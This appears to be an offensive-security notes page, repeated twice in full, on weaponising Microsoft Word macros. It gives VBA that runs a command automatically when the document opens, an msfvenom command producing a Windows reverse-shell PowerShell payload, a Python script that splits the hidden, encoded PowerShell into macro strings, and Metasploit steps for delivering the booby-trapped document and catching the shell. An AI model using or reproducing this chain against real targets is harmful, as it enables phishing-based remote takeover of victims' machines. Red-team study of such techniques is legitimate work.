Macro

Manual Method

Open Word Document → View → Macros → Macro Name: MyMacro → Macros in: Document(1) → Create
Save it in only .docm or .doc format .docx is not supported.

# Paste this Snippet in Macro.
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    CreateObject("Wscript.Shell").Run Str
End Sub
# Save as Word 97-2003 Document Template

One more step is having Split Powershell one-liner for the reverse shell, so we have 3 step process:

1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f hta-psh -o evil.hta
# read evil.hta and copy the powershell.exe string 

2) Put the Powershell script in a Python code below for splitting
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n):
	print "Str = Str + " + '"' + str[i:i+n] + '"'

3) Copy the split and paste it in Macro (below Dim str and above CreateObject)

Metasploit

Follow the First 4 Steps with the below's reference: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/fileformat/office_word_macro.md
Upload the doc file to the attacker’s FTP or somewhere with the payload

use exploit/multi/fileformat/office_word_macro
set payload windows/shell_reverse_tcp
set lhost and lport
Open a listener and pop up a reverse shell.

PreviousHTML (.hta)NextOLE

Last updated 1 year ago

Was this helpful?

Macro

Manual Method

Open Word Document → View → Macros → Macro Name: MyMacro → Macros in: Document(1) → Create
Save it in only .docm or .doc format .docx is not supported.

# Paste this Snippet in Macro.
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    CreateObject("Wscript.Shell").Run Str
End Sub
# Save as Word 97-2003 Document Template

One more step is having Split Powershell one-liner for the reverse shell, so we have 3 step process:

1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f hta-psh -o evil.hta
# read evil.hta and copy the powershell.exe string 

2) Put the Powershell script in a Python code below for splitting
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n):
	print "Str = Str + " + '"' + str[i:i+n] + '"'

3) Copy the split and paste it in Macro (below Dim str and above CreateObject)

Metasploit

Follow the First 4 Steps with the below's reference: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/fileformat/office_word_macro.md
got the doc.m file? convert it to a doc https://www.notion.so/Macro-10c8a4fb88aa4b9f93dab5e58b460cb5?pvs=4#a2a42d87abdb4982a71688661032ab92
Upload the doc file to the attacker’s FTP or somewhere with the payload

use exploit/multi/fileformat/office_word_macro
set payload windows/shell_reverse_tcp
set lhost and lport
Open a listener and pop up a reverse shell.

PreviousHTML (.hta)NextOLE

Last updated 1 year ago

Was this helpful?